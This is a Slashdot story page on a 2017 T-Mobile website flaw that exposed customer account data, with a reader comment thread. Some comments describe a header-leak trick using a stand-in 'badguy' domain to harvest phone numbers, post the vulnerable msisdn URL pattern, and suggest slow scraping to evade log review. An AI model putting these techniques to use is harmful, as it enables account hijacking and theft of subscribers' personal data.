T-Mobile Website Allowed Hackers to Access Your Account Data With Just Your Phone Number (vice.com)

← Back to Stories (view on slashdot.org)

T-Mobile Website Allowed Hackers to Access Your Account Data With Just Your Phone Number (vice.com)

Posted by msmash on Tuesday October 10, 2017 @06:50AM from the security-woes dept.

Lorenzo Franceschi-Bicchierai, reporting for Motherboard: Until last week, a bug on a T-Mobile website let hackers access personal data such as email address, a customer's T-Mobile account number, and the phone's IMSI, a standardized unique number that identifies subscribers. On Friday, a day after Motherboard asked T-Mobile about the issue, the company fixed the bug. The flaw, which was discovered by security researcher Karan Saini, allowed malicious hackers who knew -- or guessed -- your phone number to obtain data that could've been used for social engineering attacks, or perhaps even to hijack victim's numbers. "T-Mobile has 76 million customers, and an attacker could have run a script to scrape the data (email, name, billing account number, IMSI number, other numbers under the same account which are usually family members) from all 76 million of these customers to create a searchable database with accurate and up-to-date information of all users," Saini, who is the founder of startup Secure7, told Motherboard in an online chat. "That would effectively be classified as a very critical data breach, making every T-Mobile cell phone owner a victim," he added.

62 comments

Min score:

Reason:

Sort:

Yay! by thegreatbob · 2017-10-10 06:55 · Score: 1

Guess what service I'm glad I nev... well, shit. A time to be glad I'm not the actual account owner (family plan).

--
There is no XUL, only WebExtensions...
Hacker? by DontBeAMoran · 2017-10-10 06:55 · Score: 3, Insightful

T-Mobile website allowed hackers to access your account data with just your phone number.
If all it takes is to type a phone number in the URL then it's not hacking.
"Unlocked doors allow thieves to open them" sounds as stupid. If they're unlocked, anyone can open them, not just thieves.

--
#DeleteFacebook
1. Re:Hacker? by Anonymous Coward · 2017-10-10 06:59 · Score: 0
  
  Honest people don't try to open doors that they KNOW they shouldn't open.
2. Re:Hacker? by TooMuchToDo · 2017-10-10 07:01 · Score: 3, Informative
  
  The US government considers it so, and prosecutes for it.
  "A hacker charged with federal crimes for obtaining the personal data of more than 100,000 iPad owners from AT&T’s publicly accessible website was sentenced on Monday to 41 months in prison followed by three years of supervised release."
  https://www.wired.com/2013/03/...
3. Re:Hacker? by Anonymous Coward · 2017-10-10 07:14 · Score: 1
  
  Try using that excuse when going in a stranger's house
4. Re:Hacker? by Anonymous Coward · 2017-10-10 07:14 · Score: 0
  
  And it was wrong then too. This is the equivalent of prosecuting someone for trespassing when they were welcomed in by the home owner's crazy ex. How the fuck was I supposed to know the crazy ex, who still had a working key, was not supposed to grant me access??
5. Re:Hacker? by Anonymous Coward · 2017-10-10 07:35 · Score: 1
  
  That's because the U.S.A. government is run by a bunch of technology-ignorant fools.
6. Re:Hacker? by Anonymous Coward · 2017-10-10 08:01 · Score: 1
  
  Not even close. This is more like someone driving to T-Mobile headquarters, walking around the lobby, noticing a door propped open that had a box in it that says, "sensitive user information," and you saying, "don't mind if I do."
  But let's go with your example, Let's say the homeowner left sensitive information lying around and you started taking pictures of it with your phone. I don't know what the law states in that situation but I would find it hard to believe you were just taking pictures of the countertops.
7. Re:Hacker? by Anonymous Coward · 2017-10-10 08:30 · Score: 4, Insightful
  
  Here's the problem with criminalizing accessing publicly accessible data... you put the burden on the *user* of determining what freely available data they "ought" to have access to.
  That's backwards. The custodians of the data have a duty to make it available appropriately... it's not the job of the public to guess at whether public data should be public.
8. Re:Hacker? by brewthatistrue · 2017-10-10 11:36 · Score: 1
  
  Sometimes it's obvious you shouldn't be doing that, and sometimes it's not.
  People get in trouble for both scenarios.
  e.g. URL munging the application website at Harvard to see application status results in offers being retracted
  https://arstechnica.com/uncate...
9. Re:Hacker? by Anonymous Coward · 2017-10-11 01:05 · Score: 0
  
  If all it takes is to type a phone number in the URL then it's not hacking.
  "Unlocked doors allow thieves to open them" sounds as stupid. If they're unlocked, anyone can open them, not just thieves.
  Most will tell you locks only keep out honest people. What they wont tell you is that - in the court of law - if you open any door, even if you're honest, and I can successfully argue that the door is there to keep you out, while reasonably explaining how any one with common sense can understand that, then you are still guilty of tresspassing. Tresspassing is a criminal offense, no matter your intent, and so, if convicted, you will be known as a convicted criminal.
10. Re:Hacker? by jimbolauski · 2017-10-11 01:36 · Score: 1
  
  The question is and always has been is it reasonable to to take. If a kid leaves their bike out in the front yard is it reasonable to assume their giving away their bike. If someone leaves their garage door open is it reasonable to pilfer their tools? Being deficient in understanding societal norms for what is acceptable is not a good defense.
  
  --
  Knowledge = Power
  P= W/t
  t=Money
  Money = Work/Knowledge so the less you know the more you make
11. Re:Hacker? by Anonymous Coward · 2017-10-11 01:54 · Score: 0
  
  One could argue that all data is publicly accessible unless it's on an airgapped network. And even then...
  Imagine someone created a device that uses x-rays to scan your pocket for keys, which could then be used to 3-d print that key. Is that public information? Is it my responsibility to store my keys in a lead-lined case when I am walking down the street? If I was responsible for private information of my customers, and I knew such an attack vector, then yes, I am responsible. But is that "hacking" or is it just scanning public areas for public information? How public is public? If a bank put a cad drawing of the key to their vault on the side of a van and drove it around the city, that's public, and grossly negligent. If a shop owner put his storefront key in his briefcase and walked across the street and someone scanned it, is that public? Then we start arguing about how ubiquitous are the tools (everyone has a web browser, very few people have an x-ray scanner), but everyone has a hammer and it can be used to "unlock" a front door.
  I 100% agree that custodians should be accountable for proper care of private information. I guess I don't see it as an either/or.
That's cool by HideyoshiJP · 2017-10-10 07:01 · Score: 1

All my other info is out there anyway. If they already know my phone number, there's not much else they need. Thanks, Equifax.
1. Re:That's cool by Anonymous Coward · 2017-10-10 07:28 · Score: 0
  
  Oh it was already out there before Equifax. Trust me.
Article is too long, superefluous by Anonymous Coward · 2017-10-10 07:17 · Score: 0

Until last week, a bug on a T-Mobile website let hackers access personal data such as email address, a customer's T-Mobile account number, and the phone's IMSI, a standardized unique number that identifies subscribers. On Friday, a day after Motherboard asked T-Mobile about the issue, the company fixed the bug.

This is really all that needs to be written about this story. The rest of the article, like others of its kind, goes on to discuss the scary theoretical harm that could have happened, rather than any actual harm. In fact, the first sentence of the above paragraph should be revised to say, "..let potential hackers access personal data..." since as article points out at the very end that T-Mobile didn't find any evidence that hackers exploited, much less even found, the vulnerability.
So a security researcher finds bug in company's website exposing customer info. Researcher notifies company of bug. Company then fixes bug. Company pays researcher a nice little reward. The end.
These hacking stories are boring.
1. Re:Article is too long, superefluous by ThisIsNotAName · 2017-10-10 07:49 · Score: 1
  
  "T-Mobile didn't find any evidence that hackers exploited, much less even found, the vulnerability."
  Given that those data accesses didn't throw any security errors, I don't trust that T-Mobile would have logged any suspicious activity related to this vulnerability.
  I hope that their security is more comprehensive than that, I just don't trust that it is.
2. Re:Article is too long, superefluous by Marxist+Hacker+42 · 2017-10-10 08:11 · Score: 1
  
  I pretty much trust that it isn't. Privacy is largely overrated, and any number attached to your name can eventually be found.
  
  --
  SJW: a person who perceives an injustice, and while correcting it, commits a greater injustice.
3. Re:Article is too long, superefluous by Anonymous Coward · 2017-10-10 08:12 · Score: 0
  
  They didn't find any unusual access of the vulnerable accounts that would be evident if a hacker used a script to scrape the website.
4. Re:Article is too long, superefluous by ThisIsNotAName · 2017-10-10 08:31 · Score: 1
  
  Do you have anything to back that up?
  All I found in the original article from T-Mobile was:
  
  Contrary to Saini's findings, T-Mobile told Motherboard the issue impacted only a small part of their customers. In a statement sent to Motherboard, the company said that "we were alerted to an issue that we investigated and fully resolved in less than 24 hours. There is no indication that it was shared more broadly."
  As far as I can tell, that doesn't clarify whether they have safeguards to detect the accesses and nothing came up or if they simply don't have anything in place and therefore didn't detect anything.
5. Re:Article is too long, superefluous by networkBoy · 2017-10-10 08:46 · Score: 1
  
  I'm thinking they looked back in access logs and didn't see any sequential or high rate queries. While that's not even remotely 100% it is a decent indicator of not having been majorly exploited.
  
  --
  whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
6. Re:Article is too long, superefluous by ThisIsNotAName · 2017-10-10 09:10 · Score: 1
  
  That's what I would assume too. Though, if I were trying to exploit it, I'd try to do it gradually over a long time to not spike activity and you wouldn't necessarily have to make a lot of effort to fly under the radar. Probably just try to vary your IP addresses but keep them within T-Mobile's service areas. Though it probably depends on what kind of traffic analysis they do.
  How likely they'd be to find that would partly depend on how long the vulnerability was present and them keeping their logs for a sufficient length of time. It may have aged out of their logs. It would also depend whether the vulnerability was limited to a small subset, most or all of their customers. T-Mobile's response indicated that it was just some customers. If it didn't work for others and threw a flag it would probably have been caught quickly. Alternatively, to T-Mobile, "some" might mean "all".
  I'm increasingly skeptical of large companies handling security well in light of other news: Equifax, Yahoo, etc.
  Of course, all of this is coming from someone who has had little training and done very little work with computer security.
7. Re:Article is too long, superefluous by networkBoy · 2017-10-10 10:35 · Score: 1
  
  I've had a fair amount of experience etc. with this. Like I said, not 100% and as to being sly there are two MOs:
  1) like you said, sly, spread out, not searching blocks of numbers
  2) crash and grab, dump as much as fast as possible before getting caught.
  If they recognised the value and wanted to get at the data as long as possible, then yes #1 is how they'd go, and reviewing the logs wouldn't be all that reliable.
  
  --
  whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
It wasn't a bug by cordovaCon83 · 2017-10-10 07:27 · Score: 1

It was a feature. But don't tell the press that!
T-Mobile Sucks by Anonymous Coward · 2017-10-10 07:29 · Score: 0

Verizon is the best, followed by AT&T.
1. Re:T-Mobile Sucks by Anonymous Coward · 2017-10-10 07:32 · Score: 0
  
  I don't care who's more "evil"
  I'm not an embearded hipster. I care if my call is going to go through.
  And you - shave that fucking stupid beard. It pisses me off. No, it doesn't make you "edgy",
2. Re:T-Mobile Sucks by Anonymous Coward · 2017-10-10 08:28 · Score: 0
  
  Verizon is the best, followed by AT&T.
  So you're saying two surviving descendants of Ma Bell are still the best. That's not surprising, and neither is it surprising that the Baby Bells are also most expensive.
3. Re:T-Mobile Sucks by Anonymous Coward · 2017-10-10 08:34 · Score: 0
  
  Never heard of either of those two.
4. Re:T-Mobile Sucks by Anonymous Coward · 2017-10-10 08:43 · Score: 0
  
  John Legere, is that you?
Equifax can learn a thing or two.. by Anonymous Coward · 2017-10-10 07:49 · Score: 1

Seems like Equifax can learn a thing or two from T-Mobile.. they're much better at fixing bugs/security holes
X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 08:13 · Score: 0

If you make an HTTP request from a T-Mobile device to any hostname beginning with "www.t-mobile.com" then your phone number is injected into the request header. All it would take for a web site to scrape phone numbers is to serve a hidden element with a URL like "http://www.t-mobile.com.badguy.domain/" and watch the log fill up with requests like this:
Host: www.t-mobile.com.badguy.domain
X-Nokia-MSISDN: phone number
1. Re:X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 08:46 · Score: 1
  
  I think there might be a flaw in your master plan there Pinky.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
2. Re:X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 09:14 · Score: 0
  
  The plan where you log request headers from T-Mobile devices and then replay the request headers to the real www.t-mobile.com and steal accounts?
3. Re:X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 09:23 · Score: 1
  
  No. The plan where you get every T-Mobile customer to access your website Pinky. But also that too.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
4. Re:X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 09:34 · Score: 0
  
  I dunno, Brain, maybe you could pay other people to insert your tracker into their web sites, like Coinhive.
5. Re:X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 09:42 · Score: 1
  
  Yep ... you are one stupid motherfucker.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
6. Re:X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 10:05 · Score: 0
  
  Let me tell you something. I own a T-Mobile MotherFucker64 Mobile Hotspot. That's the motherfucking model number: MF64. I've owned this motherfucker for so long, I have completely forgotten my T-Mobile account password. I never need my password, because whenever I visit mim.t-mobile.com from any browser on any device tethered to my motherfucker, T-Mobile never asks for my password. Any badguy could access my account and change my plan and charge my credit card. That's how T-Mobile does stupid security.
7. Re:X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 10:12 · Score: 1
  
  Time to take your meds. Off you go now ...
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
8. Re:X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 10:20 · Score: 0
  
  All right, so this Zero Kelvin person is a totally worthless motherfucker, but maybe someone else with a brain will read about the gaping security flaw which still exists where T-Mobile trusts injected HTTP headers to identify subscribers.
9. Re: X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 10:43 · Score: 1
  
  If you want to be taken seriously by the people who belong here create and account and log in. No real slashdotter gives a fuck what some idiot rambles on about as an AC, because we know what AC status is for and how it is being abused.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
10. Re:X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 10:44 · Score: 0
  
  DuckDuckGo t-mobile.com msisdn
  https ://mim.t-mobile.com/primary/openPage?msisdn=
  LOL
11. Re: X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 10:51 · Score: 0
  
  If you're the kind of shit that belongs here, there's no hope for slashdot. Fuck you, motherfucker.
12. Re: X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 10:56 · Score: 1
  
  Slashdot lost all hope long ago My incompetent friend.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
13. Re: X-Nokia-MSISDN by Anonymous Coward · 2017-10-10 11:05 · Score: 0
  
  Keep posting, Lord Zero IQ. Don't you want a following of AC trolls all screaming "motherfucker" at you? We need another asshole around here to be a troll magnet after the demise of creimy-weimy.
14. Re: X-Nokia-MSISDN by Zero__Kelvin · 2017-10-10 11:15 · Score: 0
  
  I truly don't give a flying fuck. If you weren't so fucking stupid you would have figured that out by now.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
You think thatâ(TM)s bad? by Anonymous Coward · 2017-10-10 08:40 · Score: 1

My phone company back in the 1980s would accidentally mail me a thick book with everyoneâ(TM)s phone number and physical address. I really could have done some crazy stuff with it, but the most I did with it was to call my classmateâ(TM)s house..
1. Re:You think thatâ(TM)s bad? by Zero__Kelvin · 2017-10-10 08:47 · Score: 1
  
  yeah ... this isn't that.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
2. Re: You think thatâ(TM)s bad? by Anonymous Coward · 2017-10-10 08:50 · Score: 0
  
  Really ok so getting a personâ(TM)s phone number and email address is worse than knowing their name, phone number, and address?
3. Re: You think thatâ(TM)s bad? by Zero__Kelvin · 2017-10-10 09:21 · Score: 1
  
  First of all, most landline phone numbers weren't account logins for bank accounts, second of all there is this little piece of information you don't seem to understand. There is a third and fourth thing that makes it different as well, but you get the idea .. or not. Probably not.
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
4. Re: You think thatâ(TM)s bad? by Anonymous Coward · 2017-10-10 11:33 · Score: 0
  
  Landline phone numbers are account logins for supermarket loyalty deals. I could use all your discounts.
5. Re: You think thatâ(TM)s bad? by Zero__Kelvin · 2017-10-10 12:06 · Score: 1
  
  Sure, if that wasn't actually a now defunct mobile number you could :^)
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
A "bug", no, it was intentionally put there by Anonymous Coward · 2017-10-10 09:05 · Score: 0

note very well how everytime a "bug" or "security issue" pops up, it's a tiny little thing, sticking out like a sore thumb to anyone inspecting the code, which results in a full and complete compromise. You have them in Windows, in macOS, in iOS, and they're ALWAYS intentionally put there.
T-Mobile is Magenta. I like Pink. by Anonymous Coward · 2017-10-10 11:28 · Score: 0

Na na na na na na na na na na na na [x2]
I guess I just lost my husband,
I don't know where he went,
So I'm gonna drink my money,
I'm not gonna pay his rent (nope),
I got a brand new attitude and
I'm gonna wear it tonight,
I wanna get in trouble,
I wanna start a fight,
Na na na na na na na I wanna start a fight,
Na na na na na na na I wanna start a fight.
[Chorus:]
So, so what
I'm still a rock star,
I got my rock moves,
And I don't need you,
And guess what,
I'm having more fun,
And now that weâ(TM)re done,
I'm gonna show you tonight,
I'm alright,
I'm just fine,
And you're a tool,
So, so what,
I am a rock star,
I got my rock moves,
And I don't want you tonight.
1. Re: T-Mobile is Magenta. I like Pink. by Zero__Kelvin · 2017-10-10 11:32 · Score: 1
  
  Well at least you finally posted something worthwhile anyeah. Pink is fucking awesome!
  
  --
  Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
1-805-637-7243 Directly to Voice Mail by Trax3001BBS · 2017-10-10 11:43 · Score: 1

"call 1-805-637-7243, otherwise known as the "Voice Mail Back Door number." When you hear the prompt, i.e. "Welcome to the T-Mobile
messaging center. Please enter the 10-digit number of the person you
are trying to reach," enter the number. You will then be connected
directly with that person's voicemail. Press "1" to leave a message,
leave your message and hang up." http://answers.google.com/answ...
Maybe if there is one of these by bravecanadian · 2017-10-10 12:14 · Score: 1

Every day like their has been for a few days now... IT will finally be forced to turn into a profession.
I'm sure this is like the 3-5 time this has happen by Anonymous Coward · 2017-10-10 13:50 · Score: 0

I've read this story before on /. About 4-5 times over the last 20 years. T-Mobile has had a history of problems with the website.
Maybe we alll.... by MoarSauce123 · 2017-10-10 23:10 · Score: 1

....should just get a new identity and move. We get random names, SSNs, and addresses assigned and start our lives over from scratch.